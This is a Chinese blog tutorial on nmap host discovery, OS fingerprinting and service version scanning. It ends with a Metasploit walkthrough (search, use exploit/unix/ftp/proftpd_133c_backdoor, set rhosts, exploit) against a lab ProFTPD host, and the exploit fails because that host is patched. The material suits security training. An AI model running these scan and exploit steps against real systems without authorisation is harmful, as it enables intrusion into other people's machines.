nmap扫描教程02

文章介绍了使用Nmap进行网络扫描,包括ICMP、TCPSYN/ACK等技术,针对同一网段和不同网段的主机发现。涉及指纹识别、Banner识别,以及利用ProFTPD漏洞的过程,最后提到通过Metasploit(msf)进行exploit但发现漏洞已修复。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Network Sweeping

ping sweep
为了处理大量主机,或者节省网络流量,我们可以尝试使用网络扫描技术弹出目标,在这种技术中,我们从广泛扫描开始,然后对感兴趣的主机使用更具体的扫描

ping 扫描(扫一下同一个网段还行,感觉跨网段就很拉跨)
nmap -sn 192.168.99.0/24
只做主机发现,不做端口扫描
主机发现主要用到的技术有:
1.icmp request
2.433–TCP SYN
3.80–TCP ACK

在这里插入图片描述

同网段发送arp请求,不同网段发送433请求TCP

在这里插入图片描述

nmap -sn 172.30.1.0/24 -oG scan_oG.txt
-oG 对扫描的结果进行归类保存

在这里插入图片描述

指纹识别

nmap -O 172.30.1.128
-O :扫描判断系统指纹,但是不一定精准,需要配合其他工具判断

在这里插入图片描述

Banner和服务识别

Banner 中一般包含了软件的名称(服务名称)和软件的版本(服务版本),在图下可以看出当前msf的版本是v6.2.26,当然这个banner是可以被修改了,通过修改banner的信息来误导攻击者进行错误的攻击。

在这里插入图片描述

nmap -sV 172.30.1.128
-V :通过协议扫描开启端口服务的信息
通过扫描服务的版本去谷歌搜索当前版本服务有什么可以利用的漏洞,漏洞如果没有修复就可以直接利用

在这里插入图片描述

exploit 漏洞利用的意思

在这里插入图片描述

然后过msf 实现漏洞利用

在这里插入图片描述

msfdb run

在这里插入图片描述

search proftpd
search 搜索版本名称找到对应的版本编号

在这里插入图片描述

use 4
使用对应的模块序号
use exploit/unix/ftp/proftpd_133c_backdoor
或者使用对应的地址信息启用
options 查看配置详情

在这里插入图片描述

set rhosts 172.30.1.128
设置目标主机地址为 172.30.1.128
options

在这里插入图片描述

exploit
exploit 执行
发现这个漏洞是修复了的无法直接利用

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值